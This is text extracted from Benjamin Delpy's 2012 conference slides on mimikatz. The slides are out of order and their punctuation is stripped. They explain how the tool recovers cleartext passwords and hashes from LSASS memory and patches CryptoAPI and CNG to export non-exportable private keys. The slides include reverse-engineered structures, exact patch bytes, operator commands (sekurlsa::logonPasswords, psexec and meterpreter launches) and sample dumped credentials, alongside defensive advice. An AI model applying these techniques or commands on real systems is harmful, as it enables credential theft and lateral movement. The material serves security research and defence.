KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flinkstruct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCountPVOID unk0PVOID unk1PVOID unk2DWORD unk3DWORD unk4PVOID unk5PVOID unk6PVOID unk7LUID LocallyUniqueIdentifier
ifdef _M_IX86DWORD unk8
endifDWORD unk9DWORD unk10PVOID unk11DWORD unk12DWORD unk13PVOID unk14PVOID unk15PVOID unk16[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsademo time
Final sekurlsa demo sekurlsalogonPasswords full
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30
mimikatz sekurlsa kerberosldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31
mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32
LsaUnprotectMemory
mimikatz sekurlsaLsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKeyBYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsasrv
lsass
lsasrv
mimikatz
lsasrv
copyhellip
mimikatz sekurlsaLsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34
InitializationVector BYTE[16]
lsass
lsasrv
lsass
lsasrv
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD sizeDWORD tagDWORD typeDWORD unk0DWORD unk1DWORD unk2DWORD unk3PVOID unk4BYTE data etc
KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv typedef struct _KIWI_BCRYPT_KEY
DWORD sizeDWORD typePVOID unk0PKIWI_BCRYPT_KEY_DATA clePVOID unk1
KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsamemo
Security Packages
Protection Keys
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionListlsasrvLogonSessionListCount
LIST_ENTRYULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKeylsasrvg_pRandomKey
DESx lsasrvg_pDESXKeylsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsamemo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz
mimikatz privilegedebugDemande dACTIVATION du privilegravege SeDebugPrivilege OK
mimikatz sekurlsalogonPasswords full
Authentification Id 0234870Package dauthentification NTLMUtilisateur principal Gentil KiwiDomaine dauthentification vm-w8-rp-x
msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a
kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
livessp nt (LUID KO)
mimikatz sekurlsawhat we can do
Basicsndash No physical access to computer (first step to pass the hash then pass the pass)ndash No admin rights system rights debug privileges (hellip)ndash Disable local admin accountsndash Strong passwords (haha it was a joke so useless )ndash For privileged account network login instead of interactive (when possible)ndash Audit pass the hash keeps traces and can lock accountsndash No admin rights system rights debug privileges even VIPndash Use separated network (or forest) for privileged tasks
More in depthndash Force strong authentication (SmartCard amp Token) $ eurondash Short validity for Kerberos ticketsndash No delegationndash Disable NTLM (available with NT6)ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows)bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys ))ndash Let opportunities to stop retro compatibilityndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37
mimikatz cryptowhat is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeysbull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Exportbull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patchbull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38
mod_mimikatz_crypto
mimikatz cryptohow itrsquos protected
Private keys are DPAPI protectedndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39
Constraint for most userUnavailable for computer keys
certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatzarchitecture of sekurlsa amp crypto
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 4
mimikatzexe
mod_mimikatz_sekurlsa
mod_mimikatz_nogpo
mod_mimikatz_divers
mod_mimikatz_winmine
mod_mimikatz_impersonate
mod_mimikatz_inject
mod_mimikatz_samdump
mod_mimikatz_standard
mod_mimikatz_crypto
mod_mimikatz_handle
mod_mimikatz_system
mod_mimikatz_service
mod_mimikatz_process
mod_mimikatz_thread
mod_mimikatz_terminalserver
mod_mimikatz_privilege
mod_pipe
mod_inject
mod_memory
mod_parseur
mod_patch
mod_hive
mod_secacl
mod_privilege
mod_process
mod_service
mod_system
mod_thread
mod_ts
mod_text
mod_crypto
mod_cryptoapi
mod_cryptoacng
msv_1_0
tspkg
wdigest
livessp
kerberos
kappfreedll
kelloworlddll
klockdll
mimikatzsys
sekurlsadll
sam
secrets
msv_1_0
wdigest
livessp
kerberos
tspkg
mimikatz sekurlsawhat is it
A module replacement for my previous favorite library
A local module that can read data from the SamSS Service (well known LSASS process)
What sekurlsa module can dump ndash MSV1_0 hashes
ndash TsPkg passwords
ndash Wdigest passwords
ndash LiveSSP passwords
ndash Kerberos passwords ()
ndash hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 5
mod_mimikatz_sekurlsa
mimikatz sekurlsahow LSA works ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 6
LsaSSWinLogon
AuthenticationPackagesmsv1_0
tspkg
wdigest
livessp
kerberos
Authentication
msv1_0
kerberos
SAM
ChallengeResponse
userdomainpassword
PLAYSKOOL
mimikatz sekurlsahow LSA works ( level)
Authentication packages
ndash take userrsquos credentials from the logon
ndash make their own stuff
ndash keep enough data in memory to compute responses of challenges (Single Sign On)
If we can get data and inject it in another session of LSASS we avoid authentication part
This is the principle of laquo Pass-the-hash raquo
ndash In fact of laquo Pass-the-x raquo
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 7
PLAYSKOOL
mimikatz sekurlsahistory of laquo pass-the- raquo 12
Pass-the-hashndash 1997 - Unix modified SAMBA client for Hashes usage Paul Ashton (EIGEN)
ndash 2000 - Private version of a Windows laquo LSA Logon Session Editor raquo HernanOchoa (CoreSecurity)
ndash 2007 - TechEd Microsoft Marc Murray (TrueSec) present msvctl and provide some downloads of it
ndash 2007 - laquo Pass the hash toolkit raquo published Hernan Ochoa (CoreSecurity)
ndash 2007 - mimikatz 01 includes pass the hash and is publicly available for x86 amp x64 versions of Windows (yeah by myself but in French so not famous ))
2007 was the year of pass the hash
Pass-the-ticketndash 042011 - wce (pass the hash toolkit evolution) provides Kerberos ticket
support Hernan Ochoa (Ampliasecurity)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 8
mimikatz sekurlsahistory of laquo pass-the- raquo 22
Pass-the-passndash 052011 ndash mimikatz 10 dumps first clear text passwords from TsPkg provider (but limited to NT
6 and some XP SP3)bull httpbloggentilkiwicomsecuritepass-the-pass
ndash 052011 ndash return of mimikatz it dumps clear text passwords from WDigest provider (unlimited this time ))
bull httpbloggentilkiwicomsecuritere-pass-the-pass
ndash 052011 ndash Some organizations opened cases to Microsoft about ithellip
hellipLots of timehellip
ndash begin of 2012 - Lots of blogs (and Kevin Mitnick )) say few words about mimikatz
ndash 032012 - Hernan Ochoa (Ampliasecurity) publish at seclists that wce support WDigest password extracthellip
bull httpseclistsorgpen-test2012Mar7
ndash 032012 ndash mimikatz strikes again with LiveSSP provider and extracts Live login passwords from Windows 8 memory
bull httpbloggentilkiwicomsecuriterere-pass-the-pass
ndash 032012 ndash yeah once againhellip more curious but Kerberos keeps passwords in memorybull httpbloggentilkiwicomsecuritererere-pass-the-pass
ndash 082012 ndash sekurlsa module without injection at all (ultra safe)bull httpbloggentilkiwicomsecuritemimikatzsekurlsa-fait-son-apparition
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 9
mimikatz sekurlsa tspkg
because sometimes hash is not enoughhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 10
mimikatz sekurlsa tspkgwhat is it
Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDestkop usersrsquosexperiencendash httptechnetmicrosoftcomlibrarycc772108aspx
Rely on CredSSP with Credentials Delegation (= Account delegation)ndash Specs httpdownloadmicrosoftcomdownload95e95ef66af-
9026-4bb0-a41d-a4f81802d92c5Bms-cssp5Dpdf
First impression it seems cool ndash User does not have to type its password
ndash Password is not in RDP file
ndash Password is not in user secrets
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 11
mimikatz sekurlsa tspkgquestions
KB says that for it works we must enable laquo Default credentials raquo delegationndash ldquoDefault credentials The credentials obtained when the user first logs on to
Windowsrdquo - httpsmsdnmicrosoftcomlibrarybb204773aspx
bull What Our UserDomainPassword | Hash | Ticket It seems hellipndash In all cases system seems to be vulnerable to pass-the-hellip
In what form Our specs [MS-CSSP]
ndash 22121 TSPasswordCredsbull The TSPasswordCreds structure contains the users password credentials that are delegated
to the server (or PIN) TSPasswordCreds = SEQUENCE
domainName [0] OCTET STRING userName [1] OCTET STRING password [2] OCTET STRING
ndash Challenge response for authentication bull Serveur YES (TLS Kerberos)bull Client NO password is sent to serverhellip
So password resides somewhere in memory
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 12
mimikatz sekurlsa tspkgsymbols amp theory
Letrsquos explore some symbols
ndash sounds coolhellip (thanks Microsoft)
Letrsquos imagine a scenariondash Enumerate all sessions to obtain
bull Username
bull Domain
bull LUID
ndash Call tspkgTSCredTableLocateDefaultCreds (rely on RtlLookupElementGenericTableAvl) with LUID to obtain
bull TS_CREDENTIAL
ndash Call tspkgTSObtainClearCreds (rely on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
bull TS_PRIMARY_CREDENTIAL with clear text credentialshellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 13
kdgt x tspkgclear75016d1c tspkgTSObtainClearCreds = ltno type informationgtkdgt x tspkgpassword75011b68 tspkgTSDuplicatePassword = ltno type informationgt75011cd4 tspkgTSHidePassword = ltno type informationgt750195ee tspkgTSRevealPassword = ltno type informationgt75012fbd tspkgTSUpdateCredentialsPassword = ltno type informationgtkdgt x tspkglocate7501158b tspkgTSCredTableLocateDefaultCreds = ltno type informationgt
mimikatz sekurlsa tspkgworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 14
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_TS_CREDENTIAL
KIWI_TS_PRIMARY_CREDENTIAL
typedef struct _KIWI_TS_PRIMARY_CREDENTIAL PVOID unk0LSA_UNICODE_STRING DomaineLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING Password
KIWI_TS_PRIMARY_CREDENTIAL PKIWI_TS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
tspkgTSGlobalCredTable
typedef struct _KIWI_TS_CREDENTIAL ifdef _M_X64
BYTE unk0[108]elif defined _M_IX86
BYTE unk0[64]endif
LUID LocallyUniqueIdentifierPVOID unk1PVOID unk2PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary
KIWI_TS_CREDENTIAL PKIWI_TS_CREDENTIALKIWI_TS_CREDEN
TIAL
mimikatz sekurlsa tspkgdemo time
sekurlsatspkg
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 15
mimikatz sekurlsa wdigest
because clear text password over httphttps is not cool
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 16
mimikatz sekurlsa wdigestwhat is it
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquoWikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web sitendash Authenticated client access using SASLndash Authenticated client access with integrity protection to a directory service
using LDAPrdquoMicrosoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashesndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 17
mimikatz sekurlsa wdigestwhat is it
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 18
mimikatz sekurlsa wdigesttheory
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digestndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemoryndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLEndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemoryndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLEndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in argsbull Protect it with LsaProtectMemorybull Update or insert data in double linked list wdigestl_LogSessList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 19
text7409D151 _DigestCalcHA18 call dword ptr [eax+0B4h]
text74096C69 _SpAcceptCredentials16 call dword ptr [eax+0B0h]
mimikatz sekurlsa wdigestworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 20
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
typedef struct _KIWI_WDIGEST_LIST_ENTRY struct _KIWI_WDIGEST_LIST_ENTRY Flinkstruct _KIWI_WDIGEST_LIST_ENTRY BlinkDWORD UsageCountstruct _KIWI_WDIGEST_LIST_ENTRY ThisLUID LocallyUniqueIdentifier[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password[hellip]
KIWI_WDIGEST_LIST_ENTRY PKIWI_WDIGEST_LIST_ENTRY
wdigestl_LogSessList
search linked list for LUID
KIWI_WDIGEST_LIST_ENTRY
password in clear
mimikatz sekurlsa wdigestdemo time
sekurlsawdigest
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 21
mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
